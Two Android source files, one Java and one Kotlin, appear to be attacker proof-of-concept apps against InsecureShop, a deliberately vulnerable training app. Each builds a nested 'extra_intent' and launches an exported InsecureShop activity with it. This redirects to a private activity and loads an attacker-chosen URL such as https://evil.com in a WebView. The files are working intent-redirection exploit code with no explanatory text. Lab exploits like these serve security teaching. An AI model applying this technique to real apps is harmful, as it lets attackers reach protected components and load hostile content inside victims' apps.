File: attackerintentredirection/app/src/main/java/com/example/attackerintentredirection/MainActivity.java
package com.example.attackerintentredirection;

import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;
import android.os.Bundle;



public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Intent extra = new Intent();
        extra.setClassName("com.insecureshop", "com.insecureshop.AboutUsActivity");
        extra.putExtra("url", "https://evil.com");

        Intent intent = new Intent();
        intent.setClassName("com.insecureshop", "com.insecureshop.CUSTOM_INTENT");
        intent.putExtra("extra_intent", extra);
        startActivity(intent);

    }

}

File: attackerintentredirect/app/src/main/java/com/example/attackerintentredirect/MainActivity.kt
package com.example.attackerintentredirect

import android.annotation.SuppressLint
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.view.View
import android.widget.Button
import android.content.Intent

class MainActivity : AppCompatActivity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val btn = findViewById<Button>(R.id.btn)
    }

    fun btn(view: View) {

        val extra = Intent()
        extra.setClassName("com.insecureshop", "com.insecureshop.PrivateActivity")
        extra.putExtra("url", "http://erev0s.com/")

        val intent = Intent()
        intent.setClassName("com.insecureshop", "com.insecureshop.WebView2Activity")
        intent.putExtra("extra_intent", extra)
        startActivity(intent)
    }
}